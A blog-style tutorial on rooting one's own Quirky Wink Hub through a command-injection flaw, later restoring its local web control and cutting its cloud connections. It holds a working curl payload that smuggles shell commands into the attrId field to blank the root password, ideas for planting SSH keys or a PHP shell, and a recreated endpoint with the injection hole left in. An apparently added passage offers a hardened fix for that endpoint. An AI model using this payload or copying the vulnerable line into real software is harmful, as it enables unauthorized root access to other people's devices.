Rooting The Quirky Wink Hub

As you may know, the Quirky Wink Hub is an affordable home automation device containing the following radios: WiFi, Bluetooth, ZigBee, Z-Wave, Lutron, and Kidde. It is operated through the Wink app, which talks to the hub via a cloud server. It is sold at Home Depot and Amazon.

Well, that’s good, but what if we want to take matters into our own hands? The device is a nice little Freescale i.MX283 based Linux box that we can have some fun with, especially with all the radio support.

Luckily, the enterprising crew at GTVHacker has discovered a nice exploit that makes rooting this hardware quite easy: http://dc22.gtvhacker.com/index.php/Wink_Hub

This is briefly discussed at:  http://hackaday.com/2014/08/09/defcon-22-hack-all-the-things/

Unfortunately, this is patched in the most recent firmware update: the set_dev_value.php file has been removed. So be sure to do this before you have connected the hub to the internet.

But what about a how-to?

Let’s get to it:

Plug in your Quirky Wink Hub and connect to the default WiFi AP that it creates.

Using cURL or similar, send the following command to the lighttpd server to remove the root password:

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

We should be able to access the shell now through the UART using a 3.3V TTL adapter.

If we don’t have the hardware to do that, there is another option. You can use the tftp command to bring over a replacement RSA key file for dropbear, which runs on the device by default, or use another cURL command to append your public RSA key to the /root/.ssh/authorized_keys file. Then you can access the device through SSH. Or you can create a new PHP file to preserve shell command access through the web server.

Now that we have access to the device, we notice that there is a web interface available by default at /devices.php. This allows us to view and control the home automation devices linked to the hub. However, the control part does not work, because the set_dev_value.php file it relies on has been removed by the update. We can restore that function by recreating /var/www/set_dev_value.php with the following line:

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

So we have a fully functional web interface to view and control the status of our connected devices.  We can use this as an API.
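One caveat before exposing this as an API: the $cmd line above concatenates the POST parameters straight into a shell command, which is exactly the command injection that rooted the hub in the first place, so anyone who can reach the hub’s web server can run commands as the web server user. The following is an added example (not code from the Wink firmware or from the original post) of a hardened replacement for that line; the parameter names nodeId and attrId are taken from the post, while the name of the value parameter (value) and the allowed character patterns are assumptions.

```php
<?php
// Added example, not the hub's own set_dev_value.php: validate every POST
// parameter against a strict pattern before anything reaches the shell.
// The patterns below are assumptions about what aprontest accepts.

// Return the raw value if it matches $pattern, otherwise null.
function validateParam(?string $raw, string $pattern): ?string {
    if ($raw === null || !preg_match($pattern, $raw)) {
        return null;
    }
    return $raw;
}

// Build the aprontest command line, or return null if any input is unsafe.
function buildAprontestCommand(array $post): ?string {
    $nodeId = validateParam($post['nodeId'] ?? null, '/^[0-9]{1,6}$/');
    $attrId = validateParam($post['attrId'] ?? null, '/^[0-9]{1,6}$/');
    // "value" is an assumed parameter name; the original post only shows $v.
    $value  = validateParam($post['value']  ?? null, '/^[A-Za-z0-9_.-]{1,32}$/');
    if ($nodeId === null || $attrId === null || $value === null) {
        return null;
    }
    // escapeshellarg() is belt and braces: the patterns above already reject
    // ';', quotes and other shell metacharacters, so the injection used in the
    // original curl command ("attrId=;cp /etc/shadow ...") is refused outright.
    return 'aprontest -u -m ' . escapeshellarg($nodeId)
         . ' -t ' . escapeshellarg($attrId)
         . ' -v ' . escapeshellarg($value);
}

$cmd = buildAprontestCommand($_POST);
if ($cmd === null) {
    http_response_code(400);
    echo "invalid parameters\n";
    exit;
}
// Only a fully validated, quoted command line is handed to the shell.
$output = shell_exec($cmd);
echo $output === null ? '' : $output;
```

Even with this in place, the web server is unauthenticated, so the hub should stay on a network segment you control rather than be exposed beyond the local LAN.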

To add devices, we can do so using the aprontest binary which prints some nice help instructions when run with no arguments.

If we want to block the cloud connections and updates we can add the following entries to the hosts file:

127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Finally, we want to connect the hub as a client to our own WiFi network.  We can do so by POSTing the WiFi network information to the web server on the hub as follows:

curl "http://192.168.0.1/index.php" -d '{"ssid":"my_ssid","pass":"my_wifi_password"}'

As you can see the network parameters are just JSON encoded.

For some reason, these settings don’t seem to be saved to the database, so they do not persist through a reboot. Possibly this is because we did not create a user account with a valid token. So we can

cp /database/wpa_supplicant.conf /etc/

Then we can edit the /etc/init.d/S41wireless file to reflect the new location of wpa_supplicant.conf.

We can prevent these settings from being deleted if we have not created a wink account by doing:

touch /database/oauth

No, that doesn’t work: apparently the oauth file gets deleted if it is invalid, so instead we need to edit /etc/init.d/S31platform to prevent it from deleting our wpa_supplicant.conf file.

Well, we should have a nice Quirky Wink Hub completely under our control now and ready to serve us faithfully without help from the cloud.
